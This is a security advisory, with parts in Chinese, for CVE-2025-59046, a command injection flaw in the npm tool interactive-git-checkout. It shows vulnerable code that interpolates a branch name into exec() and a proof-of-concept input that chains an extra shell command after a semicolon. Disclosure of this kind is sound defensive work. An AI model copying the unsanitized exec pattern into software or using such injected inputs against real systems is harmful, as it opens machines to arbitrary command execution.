CVE-2025-59046
interactive-git-checkout has a Command Injection vulnerability
描述
The npm package `interactive-git-checkout` is an interactive command-line tool that allows users to checkout a git branch while it prompts for the branch name on the command-line. It is available as an npm package and can be installed via `npm install -g interactive-git-checkout`. Resources: * Project's npm package: https://www.npmjs.com/package/interactive-git-checkout ## Command Injection Vulnerability The `interactive-git-checkout` tool is vulnerable to a command injection vulnerability because it passes the branch name to the `git checkout` command using the Node.js child process module's `exec()` function without proper input validation or sanitization. The following vulnerable code snippets demonstrates the issue: ```js const { exec: execCb } = require('child_process'); const { promisify } = require('util'); const exec = promisify(execCb); module.exports = async (targetBranch) => { const { stdout, stderr } = await exec(`git checkout ${targetBranch}`); process.stderr.write(stderr); process.stdout.write(stdout); }; ``` ## Exploit Proof of Concept 1. Install the `interactive-git-checkout` package (as suggested by the package's README): ```bash npm install --global interactive-git-checkout ``` 2. Run the executable exposed by the installed package: ```bash $ igc ``` 3. When prompted, enter the following branch name: ```bash hello ; echo 'Command Injection Vulnerability Exploited!' > /tmp/command-injection.txt; # ``` ## Vulnerable versions All versions of interactive-git-checkout are vulnerable to this issue, up to and including to the latest version of `1.1.4`. # Author Liran Tal
如何修補 CVE-2025-59046
目前尚未發布修補版本。可考慮移除受影響套件,或參考下方連結中的上游建議。
- —未列出修補版本
CVE-2025-59046 正在被利用嗎?
低 — EPSS 為 0.5%,目前沒有觀察到大規模利用活動。
受影響套件(1)
- from 0, <= 1.1.4